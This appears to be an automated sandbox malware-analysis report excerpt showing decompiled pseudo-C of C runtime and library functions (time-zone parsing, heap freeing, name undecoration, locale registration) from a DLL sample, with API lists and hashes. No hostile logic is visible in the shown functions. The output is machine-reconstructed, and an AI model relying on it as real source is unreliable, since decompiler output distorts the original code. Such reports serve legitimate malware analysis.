								_t120 = E6E263B33(_t159,  *_t137, 0x40, _t178);
								_t193 = _t193 + 0x10;
								if(_t120 == 0) {
									while( *_t178 != 0) {
										_t178 = _t178 + 1;
										_t171 = _t171 - 1;
										if(_t171 != 0) {
											continue;
										}
										break;
									}
									_pop(_t171);
									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
									if(_t137 != 0) {
										_t178 = _t178 + 1;
									}
									_t161 = E6E24BFB3(_t159, _t178) * 0xe10;
									_v8 = _t161;
									while(1) {
										_t122 =  *_t178;
										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
											break;
										}
										_t178 = _t178 + 1;
									}
									__eflags =  *_t178 - 0x3a;
									if( *_t178 == 0x3a) {
										_t178 = _t178 + 1;
										_t161 = _v8 + E6E24BFB3(_t161, _t178) * 0x3c;
										_v8 = _t161;
										while(1) {
											_t132 =  *_t178;
											__eflags = _t132 - 0x30;
											if(_t132 < 0x30) {
												break;
											}
											__eflags = _t132 - 0x39;
											if(_t132 <= 0x39) {
												_t178 = _t178 + 1;
												__eflags = _t178;
												continue;
											}
											break;
										}
										__eflags =  *_t178 - 0x3a;
										if( *_t178 == 0x3a) {
											_t178 = _t178 + 1;
											_t161 = _v8 + E6E24BFB3(_t161, _t178);
											_v8 = _t161;
											while(1) {
												_t134 =  *_t178;
												__eflags = _t134 - 0x30;
												if(_t134 < 0x30) {
													goto L38;
												}
												__eflags = _t134 - 0x39;
												if(_t134 <= 0x39) {
													_t178 = _t178 + 1;
													__eflags = _t178;
													continue;
												}
												goto L38;
											}
										}
									}
									L38:
									__eflags = _t137;
									if(_t137 != 0) {
										_v8 = _t161;
									}
									__eflags =  *_t178;
									_t124 = 0 |  *_t178 != 0x00000000;
									_v16 = _t124;
									__eflags = _t124;
									_t125 = _v12;
									if(_t124 == 0) {
										_t29 = _t125 + 4; // 0xfffffddd
										 *((char*)( *_t29)) = 0;
										L44:
										 *(E6E258225()) = _v8;
										_t128 = E6E258219();
										 *_t128 = _v16;
										return _t128;
									}
									_push(3);
									_t28 = _t125 + 4; // 0xfffffddd
									_t129 = E6E263B33(_t161,  *_t28, 0x40, _t178);
									_t193 = _t193 + 0x10;
									__eflags = _t129;
									if(_t129 == 0) {
										goto L44;
									}
								}
							}
							goto L46;
						}
					} else {
						_t166 = _t169;
						_t135 = _t178;
						while(1) {
							_t140 =  *_t135;
							if(_t140 !=  *_t166) {
								break;
							}
							if(_t140 == 0) {
								L8:
								_t116 = 0;
							} else {
								_t9 = _t135 + 1; // 0xdde805eb
								_t141 =  *_t9;
								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
									break;
								} else {
									_t135 = _t135 + 2;
									_t166 = _t166 + 2;
									if(_t141 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t116 == 0) {
								L45:
								return _t116;
							} else {
								_t137 = _v12;
								goto L12;
							}
							goto L83;
						}
						asm("sbb eax, eax");
						_t116 = _t135 | 0x00000001;
						__eflags = _t116;
						goto L10;
					}
				}
				L83:
			}





































































                          0x6e25877c
                          0x6e258786
                          0x6e25878b
                          0x6e25878f
                          0x6e258791
                          0x6e258799
                          0x6e2587a4
                          0x6e258944
                          0x6e258946
                          0x6e258947
                          0x6e258948
                          0x6e258949
                          0x6e25894a
                          0x6e25894b
                          0x6e258950
                          0x6e258954
                          0x6e258956
                          0x6e258959
                          0x6e258960
                          0x6e258964
                          0x6e258967
                          0x6e25896b
                          0x6e25896e
                          0x6e258971
                          0x6e258976
                          0x6e258977
                          0x6e258979
                          0x6e258aa1
                          0x6e258aa1
                          0x6e258aa2
                          0x6e258aa3
                          0x6e258aa4
                          0x6e258aa5
                          0x6e258aa6
                          0x6e258aab
                          0x6e258aae
                          0x6e258aaf
                          0x6e258ab7
                          0x6e258abe
                          0x6e258ac1
                          0x6e258ace
                          0x6e258ad5
                          0x6e258ad6
                          0x6e258ad7
                          0x6e258add
                          0x6e258aec
                          0x6e258af3
                          0x6e258afb
                          0x6e258afd
                          0x6e258b07
                          0x6e258b0a
                          0x6e258b17
                          0x6e258b1a
                          0x6e258b1c
                          0x6e258b35
                          0x6e258b3d
                          0x6e258b3f
                          0x6e258b45
                          0x6e258b4a
                          0x6e258b41
                          0x6e258b41
                          0x00000000
                          0x6e258b41
                          0x6e258b1e
                          0x6e258b1e
                          0x6e258b1f
                          0x6e258b1f
                          0x6e258b1f
                          0x6e258b4c
                          0x6e258aff
                          0x6e258aff
                          0x6e258aff
                          0x6e258b59
                          0x6e258b5b
                          0x6e258b5d
                          0x6e258b5f
                          0x6e258b6f
                          0x6e258b6f
                          0x6e258b61
                          0x6e258b61
                          0x6e258b64
                          0x00000000
                          0x6e258b66
                          0x6e258b66
                          0x6e258b67
                          0x6e258b6c
                          0x6e258b64
                          0x6e258b75
                          0x6e258b80
                          0x6e258b8b
                          0x6e25897f
                          0x6e258983
                          0x6e258988
                          0x6e258989
                          0x6e25898b
                          0x00000000
                          0x6e258991
                          0x6e258995
                          0x6e25899a
                          0x6e25899b
                          0x6e25899d
                          0x00000000
                          0x6e2589a3
                          0x6e2589a9
                          0x6e2589ae
                          0x6e2589b4
                          0x6e2589bb
                          0x6e2589c1
                          0x6e2589c4
                          0x6e2589ca
                          0x6e2589d1
                          0x6e2589d7
                          0x6e2589db
                          0x6e2589e1
                          0x6e2589e4
                          0x6e2589eb
                          0x6e2589f0
                          0x6e2589f0
                          0x6e2589f2
                          0x6e2589f2
                          0x6e2589f5
                          0x6e2589fc
                          0x6e258a14
                          0x6e258a14
                          0x6e258a17
                          0x6e2589fe
                          0x6e2589fe
                          0x6e258a03
                          0x6e258a05
                          0x00000000
                          0x6e258a07
                          0x6e258a09
                          0x6e258a0f
                          0x6e258a0f
                          0x6e258a05
                          0x6e258a1f
                          0x6e258a33
                          0x6e258a39
                          0x6e258a3b
                          0x6e258a49
                          0x6e258a4b
                          0x6e258a3d
                          0x6e258a3d
                          0x6e258a40
                          0x00000000
                          0x6e258a42
                          0x6e258a44
                          0x6e258a44
                          0x6e258a40
                          0x6e258a60
                          0x6e258a67
                          0x6e258a69
                          0x6e258a78
                          0x6e258a7b
                          0x6e258a6b
                          0x6e258a6b
                          0x6e258a6e
                          0x00000000
                          0x6e258a70
                          0x6e258a73
                          0x6e258a73
                          0x6e258a6e
                          0x6e258a69
                          0x6e258a85
                          0x6e258a8f
                          0x6e258a94
                          0x6e258a99
                          0x6e258aa0
                          0x6e258aa0
                          0x6e25899d
                          0x6e25898b
                          0x6e2587bc
                          0x6e2587bc
                          0x6e2587c2
                          0x6e2587c7
                          0x6e2587fd
                          0x6e2587fe
                          0x6e258804
                          0x6e258806
                          0x6e258806
                          0x6e258809
                          0x6e258809
                          0x6e25880b
                          0x6e25880c
                          0x6e258812
                          0x6e25881d
                          0x6e258822
                          0x6e258827
                          0x6e258831
                          0x00000000
                          0x6e258837
                          0x6e258837
                          0x6e258839
                          0x6e25883a
                          0x6e25883a
                          0x6e25883d
                          0x6e25883d
                          0x6e25883f
                          0x6e258840
                          0x6e258847
                          0x6e25884c
                          0x6e258851
                          0x6e258856
                          0x6e25885e
                          0x6e25885f
                          0x6e258865
                          0x6e25886a
                          0x6e25886f
                          0x6e258875
                          0x6e25887a
                          0x6e25887b
                          0x6e25887e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e25887e
                          0x6e258883
                          0x6e258884
                          0x6e258889
                          0x6e25888b
                          0x6e25888b
                          0x6e258893
                          0x6e258899
                          0x6e25889c
                          0x6e25889c
                          0x6e2588a0
                          0x00000000
                          0x00000000
                          0x6e2588aa
                          0x6e2588aa
                          0x6e2588ad
                          0x6e2588b0
                          0x6e2588b2
                          0x6e2588c0
                          0x6e2588c2
                          0x6e2588cc
                          0x6e2588cc
                          0x6e2588ce
                          0x6e2588d0
                          0x00000000
                          0x00000000
                          0x6e2588c7
                          0x6e2588c9
                          0x6e2588cb
                          0x6e2588cb
                          0x00000000
                          0x6e2588cb
                          0x00000000
                          0x6e2588c9
                          0x6e2588d2
                          0x6e2588d5
                          0x6e2588d7
                          0x6e2588e2
                          0x6e2588e4
                          0x6e2588ee
                          0x6e2588ee
                          0x6e2588f0
                          0x6e2588f2
                          0x00000000
                          0x00000000
                          0x6e2588e9
                          0x6e2588eb
                          0x6e2588ed
                          0x6e2588ed
                          0x00000000
                          0x6e2588ed
                          0x00000000
                          0x6e2588eb
                          0x6e2588ee
                          0x6e2588d5
                          0x6e2588f4
                          0x6e2588f4
                          0x6e2588f6
                          0x6e2588fa
                          0x6e2588fa
                          0x6e2588ff
                          0x6e258901
                          0x6e258904
                          0x6e258907
                          0x6e258909
                          0x6e25890c
                          0x6e258924
                          0x6e258927
                          0x6e25892a
                          0x6e258932
                          0x6e258937
                          0x6e25893c
                          0x00000000
                          0x6e25893c
                          0x6e25890e
                          0x6e258913
                          0x6e258916
                          0x6e25891b
                          0x6e25891e
                          0x6e258920
                          0x00000000
                          0x00000000
                          0x6e258922
                          0x6e25886f
                          0x00000000
                          0x6e258856
                          0x6e2587c9
                          0x6e2587c9
                          0x6e2587cb
                          0x6e2587cd
                          0x6e2587cd
                          0x6e2587d1
                          0x00000000
                          0x00000000
                          0x6e2587d5
                          0x6e2587e9
                          0x6e2587e9
                          0x6e2587d7
                          0x6e2587d7
                          0x6e2587d7
                          0x6e2587dd
                          0x00000000
                          0x6e2587df
                          0x6e2587df
                          0x6e2587e2
                          0x6e2587e7
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e2587e7
                          0x6e2587dd
                          0x6e2587f2
                          0x6e2587f4
                          0x6e258943
                          0x6e258943
                          0x6e2587fa
                          0x6e2587fa
                          0x00000000
                          0x6e2587fa
                          0x00000000
                          0x6e2587f4
                          0x6e2587ed
                          0x6e2587ef
                          0x6e2587ef
                          0x00000000
                          0x6e2587ef
                          0x6e2587c7
                          0x00000000

                          APIs
                          • _free.LIBCMT ref: 6E2587FE
                          • _free.LIBCMT ref: 6E258822
                          • _free.LIBCMT ref: 6E2589A9
                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E272130), ref: 6E2589BB
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,6E2C7A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6E258A33
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,6E2C7A70,000000FF,?,0000003F,00000000,?), ref: 6E258A60
                          • _free.LIBCMT ref: 6E258B75
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                          • String ID: 0!'n$0!'n
                          • API String ID: 314583886-1210743812
                          • Opcode ID: 3b10f6e159776faeafea66aeba6cfd4dce3aeb173e0cf366b9780b57561367ea
                          • Instruction ID: 8658e827d0e1df55776df3c13426c912fb94c955fdc5083b5a76bfd8b80036cb
                          • Opcode Fuzzy Hash: 3b10f6e159776faeafea66aeba6cfd4dce3aeb173e0cf366b9780b57561367ea
                          • Instruction Fuzzy Hash: 87C1357592424EEBDB488FF9CE54AAA7BBBEF42314F1409BAD451D7380E7B08A11C750
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E24D3EF, Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6E24D3EF(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x6e270c10) {
					E6E24CBD3(_t52);
					_t26 = _a4;
				}
				E6E24CBD3( *((intOrPtr*)(_t26 + 0x3c)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x30)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x34)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x38)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x28)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x2c)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x40)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x44)));
				E6E24CBD3( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E6E24D23E(5,  &_v8);
				_v8 =  &_a4;
				return E6E24D28E(4,  &_v8);
			}




                          0x6e24d3f5
                          0x6e24d3f8
                          0x6e24d400
                          0x6e24d403
                          0x6e24d408
                          0x6e24d40b
                          0x6e24d40f
                          0x6e24d41a
                          0x6e24d425
                          0x6e24d430
                          0x6e24d43b
                          0x6e24d446
                          0x6e24d451
                          0x6e24d45c
                          0x6e24d46a
                          0x6e24d472
                          0x6e24d47b
                          0x6e24d483
                          0x6e24d497

                          APIs
                          • _free.LIBCMT ref: 6E24D403
                            • Part of subcall function 6E24CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000), ref: 6E24CBE9
                            • Part of subcall function 6E24CBD3: GetLastError.KERNEL32(00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000,00000000), ref: 6E24CBFB
                          • _free.LIBCMT ref: 6E24D40F
                          • _free.LIBCMT ref: 6E24D41A
                          • _free.LIBCMT ref: 6E24D425
                          • _free.LIBCMT ref: 6E24D430
                          • _free.LIBCMT ref: 6E24D43B
                          • _free.LIBCMT ref: 6E24D446
                          • _free.LIBCMT ref: 6E24D451
                          • _free.LIBCMT ref: 6E24D45C
                          • _free.LIBCMT ref: 6E24D46A
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: b5c57d17f50339d7e7482d3a3b790ac603cd19325689644bcc7dc5f61ea148d3
                          • Instruction ID: 9f7c4102c4263e28cf1bc5931b56c6b5732a8b74c25de712ae395a4058aaa141
                          • Opcode Fuzzy Hash: b5c57d17f50339d7e7482d3a3b790ac603cd19325689644bcc7dc5f61ea148d3
                          • Instruction Fuzzy Hash: E711FB7954420CFFDB05DF98C841DDE3BBAEF04654B2144A0F9098F122DB7ADE549B80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E2270E2, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 73COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 76%
                          			E6E2270E2(void* __ecx, void* __edx, signed int* _a4) {
				intOrPtr _v8;
				char _v12;
				char* _t18;
				unsigned int _t23;
				char* _t26;
				intOrPtr* _t29;
				intOrPtr* _t30;
				unsigned int _t33;
				char* _t36;
				signed int* _t38;
				void* _t41;
				intOrPtr _t47;
				intOrPtr _t50;

				_t18 =  *0x6e2c7218; // 0x0
				_t41 =  *_t18 - 0x58;
				if(_t41 == 0) {
					 *0x6e2c7218 = _t18 + 1;
					_push("void");
					goto L16;
				} else {
					if(_t41 == 0) {
						 *0x6e2c7218 = _t18 + 1;
						_t23 =  *0x6e2c7220; // 0x0
						_t26 = "...";
						if(( !(_t23 >> 0x12) & 0x00000001) == 0) {
							_t26 = "<ellipsis>";
						}
						_push(_t26);
						L16:
						E6E225A6C(_a4);
						goto L17;
					} else {
						E6E226FEC(__edx,  &_v12);
						_t50 = _v8;
						if(_t50 != 0) {
							L11:
							_t29 = _a4;
							 *_t29 = _v12;
							 *((intOrPtr*)(_t29 + 4)) = _t50;
							return _t29;
						} else {
							_t30 =  *0x6e2c7218; // 0x0
							_t47 =  *_t30;
							if(_t47 == 0) {
								goto L11;
							} else {
								if(_t47 == 0x40) {
									 *0x6e2c7218 = _t30 + 1;
									goto L11;
								} else {
									if(_t47 == 0x5a) {
										 *0x6e2c7218 = _t30 + 1;
										_t33 =  *0x6e2c7220; // 0x0
										_t36 = ",...";
										if(( !(_t33 >> 0x12) & 0x00000001) == 0) {
											_t36 = ",<ellipsis>";
										}
										E6E225EB7( &_v12, _a4, _t36);
										L17:
										return _a4;
									} else {
										_t38 = _a4;
										_t38[1] = _t38[1] & 0x00000000;
										 *_t38 =  *_t38 & 0x00000000;
										_t38[1] = 2;
										return _t38;
									}
								}
							}
						}
					}
				}
			}
















                          0x6e2270e7
                          0x6e2270ef
                          0x6e2270f2
                          0x6e227195
                          0x6e22719a
                          0x00000000
                          0x6e2270f8
                          0x6e2270fc
                          0x6e227174
                          0x6e227179
                          0x6e227185
                          0x6e22718a
                          0x6e22718c
                          0x6e22718c
                          0x6e227191
                          0x6e22719f
                          0x6e2271a2
                          0x00000000
                          0x6e2270fe
                          0x6e227102
                          0x6e227107
                          0x6e22710d
                          0x6e227166
                          0x6e227166
                          0x6e22716c
                          0x6e22716e
                          0x6e227172
                          0x6e22710f
                          0x6e22710f
                          0x6e227114
                          0x6e227118
                          0x00000000
                          0x6e22711a
                          0x6e22711d
                          0x6e227161
                          0x00000000
                          0x6e22711f
                          0x6e227122
                          0x6e227135
                          0x6e22713a
                          0x6e227146
                          0x6e22714b
                          0x6e22714d
                          0x6e22714d
                          0x6e227159
                          0x6e2271a7
                          0x6e2271ab
                          0x6e227124
                          0x6e227124
                          0x6e227127
                          0x6e22712b
                          0x6e22712e
                          0x6e227133
                          0x6e227133
                          0x6e227122
                          0x6e22711d
                          0x6e227118
                          0x6e22710d
                          0x6e2270fc

                          APIs
                          • UnDecorator::getArgumentList.LIBVCRUNTIME ref: 6E227102
                            • Part of subcall function 6E226FEC: Replicator::operator[].LIBVCRUNTIME ref: 6E227058
                            • Part of subcall function 6E226FEC: DName::operator+=.LIBVCRUNTIME ref: 6E227060
                          • DName::operator+.LIBCMT ref: 6E227159
                          • DName::DName.LIBVCRUNTIME ref: 6E2271A2
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                          • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                          • API String ID: 834187326-2211150622
                          • Opcode ID: 610bee019bb478f271409b3d8826ef367bfc60c77d29fab54251367a64c668b2
                          • Instruction ID: e36a2fff2aaca9da93800c7487182c7d0d0b7ae34ee3949ede7615e3ce7083e3
                          • Opcode Fuzzy Hash: 610bee019bb478f271409b3d8826ef367bfc60c77d29fab54251367a64c668b2
                          • Instruction Fuzzy Hash: 61219F7061460E9FDF84CFACC8A8BAA7BE6EF06755F084164E845CB291C770DA41DB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20777F, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E20777F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				intOrPtr _v0;
				signed int _v4;
				void* _v16;
				char _v20;
				char _v32;
				void* _t19;
				intOrPtr* _t20;
				intOrPtr* _t42;
				void* _t50;

				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653( &_v20, 0);
				_t50 =  *0x6e2c6c10; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t50;
				_t19 = E6E1E161C(0x6e2c6b2c);
				_t38 = _a8;
				_t20 = E6E1E171B(_a8, _t19);
				_t48 = _t20;
				if(_t20 != 0) {
					L5:
					E6E2066BA( &_v20);
					return E6E220075(_t48);
				} else {
					if(_t50 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E207E4C(__ebx, _t38, __edx, _t48, _t50) - 0xffffffff;
						if(__eflags == 0) {
							_t42 =  &_v32;
							E6E1E1438(_t42);
							E6E223D74( &_v32, 0x6e2c3504);
							asm("int3");
							 *_t42 = _v0;
							return _t42;
						} else {
							_t48 = _v16;
							_v16 = _t48;
							_v4 = 1;
							E6E206FD3(__eflags, _t48);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t48 + 4))))();
							 *0x6e2c6c10 = _t48;
							goto L5;
						}
					} else {
						_t48 = _t50;
						goto L5;
					}
				}
			}












                          0x6e207786
                          0x6e207790
                          0x6e207795
                          0x6e2077a0
                          0x6e2077a4
                          0x6e2077a7
                          0x6e2077ac
                          0x6e2077b0
                          0x6e2077b5
                          0x6e2077b9
                          0x6e2077fe
                          0x6e207801
                          0x6e20780d
                          0x6e2077bb
                          0x6e2077bd
                          0x6e2077c3
                          0x6e2077c9
                          0x6e2077d1
                          0x6e2077d4
                          0x6e20780e
                          0x6e207811
                          0x6e20781f
                          0x6e207824
                          0x6e20782b
                          0x6e207830
                          0x6e2077d6
                          0x6e2077d6
                          0x6e2077d9
                          0x6e2077dd
                          0x6e2077e1
                          0x6e2077ee
                          0x6e2077f6
                          0x6e2077f8
                          0x00000000
                          0x6e2077f8
                          0x6e2077bf
                          0x6e2077bf
                          0x00000000
                          0x6e2077bf
                          0x6e2077bd

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E207786
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E207790
                          • int.LIBCPMT ref: 6E2077A7
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • codecvt.LIBCPMT ref: 6E2077CA
                          • std::_Facet_Register.LIBCPMT ref: 6E2077E1
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E207801
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20781F
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
                          • String ID: ,k,n
                          • API String ID: 2594415655-471452842
                          • Opcode ID: 3dfab4b70d6542cd1a2806a9ce26b487951b8c9b1d2862f78e078a0c6e12c66e
                          • Instruction ID: 0179d36af2547f3a6f86643ce04adbca5e5398214e6b67d57264304a796339a0
                          • Opcode Fuzzy Hash: 3dfab4b70d6542cd1a2806a9ce26b487951b8c9b1d2862f78e078a0c6e12c66e
                          • Instruction Fuzzy Hash: B311E975A0061D9BCB01EBE4C844AEDB7BBBF44B14F100918E410AB3E0DFB4AA44C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20EEEB, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20EEEB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t321;
				signed int _t322;
				void* _t334;
				void* _t347;
				void* _t360;
				void* _t373;
				void* _t386;
				void* _t399;
				void* _t412;
				void* _t425;
				void* _t438;
				void* _t451;
				void* _t464;
				void* _t477;
				void* _t490;
				void* _t503;
				void* _t516;
				void* _t529;
				void* _t542;
				void* _t555;
				void* _t568;
				void* _t581;
				void* _t594;
				signed int _t853;
				signed int _t923;
				signed int _t924;
				signed int _t925;
				signed int _t926;
				signed int _t927;
				signed int _t928;
				signed int _t929;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				signed int _t933;
				signed int _t934;
				signed int _t935;
				signed int _t936;
				signed int _t937;
				signed int _t938;
				signed int _t939;
				signed int _t940;
				signed int _t941;
				signed int _t942;
				signed int _t943;
				signed int _t945;
				signed int _t946;
				signed int _t947;
				signed int _t948;
				signed int _t949;
				signed int _t950;
				signed int _t951;
				signed int _t952;
				signed int _t953;
				signed int _t954;
				signed int _t955;
				signed int _t956;
				signed int _t957;
				signed int _t958;
				signed int _t959;
				signed int _t960;
				signed int _t961;
				signed int _t962;
				signed int _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t967;
				void* _t990;

				_t920 = __edx;
				_t699 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t990 - 0x14, 0);
				_t945 =  *0x6e2c6e04; // 0x0
				 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
				 *(_t990 - 0x10) = _t945;
				_t321 = E6E1E161C(0x6e2c6b30);
				_t702 =  *((intOrPtr*)(_t990 + 8));
				_t322 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t321);
				_t922 = _t322;
				if(_t322 != 0) {
					L5:
					E6E2066BA(_t990 - 0x14);
					return E6E220075(_t922);
				} else {
					if(_t945 == 0) {
						_push( *((intOrPtr*)(_t990 + 8)));
						_push(_t990 - 0x10);
						__eflags = E6E210C9D(__ebx, _t702, __edx, _t922, _t945) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t990 - 0x20);
							E6E223D74(_t990 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t922, _t945, 0x14);
							E6E206653(_t990 - 0x14, 0);
							_t946 =  *0x6e2c6de4; // 0x0
							 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
							 *(_t990 - 0x10) = _t946;
							_t334 = E6E1E161C(0x6e2c6d90);
							_t709 =  *((intOrPtr*)(_t990 + 8));
							_t923 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t334);
							__eflags = _t923;
							if(_t923 != 0) {
								L12:
								E6E2066BA(_t990 - 0x14);
								return E6E220075(_t923);
							} else {
								__eflags = _t946;
								if(_t946 == 0) {
									_push( *((intOrPtr*)(_t990 + 8)));
									_push(_t990 - 0x10);
									__eflags = E6E210D03(_t699, _t709, __edx, _t923, _t946) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t990 - 0x20);
										E6E223D74(_t990 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t699, _t923, _t946, 0x14);
										E6E206653(_t990 - 0x14, 0);
										_t947 =  *0x6e2c6db4; // 0x0
										 *(_t990 - 4) =  *(_t990 - 4) & 0x00000000;
										 *(_t990 - 0x10) = _t947;
										_t347 = E6E1E161C(0x6e2c6d68);
										_t716 =  *((intOrPtr*)(_t990 + 8));
										_t924 = E6E1E171B( *((intOrPtr*)(_t990 + 8)), _t347);
										__eflags = _t924;
										if(_t924 != 0) {
											L19:
											E6E2066BA(_t990 - 0x14);
											return E6E220075(_t924);
										} else {
											__eflags = _t947;
											if(_t947 == 0) {
												_push( *((intOrPtr*)(_t990 + 8)));
												_push(_t990 - 0x10);
												__eflags = E6E210DA5(_t699, _t716, __edx, _t924, _t947) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t990 - 0x20);
													E6E223D74(_t990 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t699, _t924, _t947, 0x14);
													E6E206653(_t990 - 0x14, 0);
													_t948 =  *0x6e2c6dd4; // 0x0
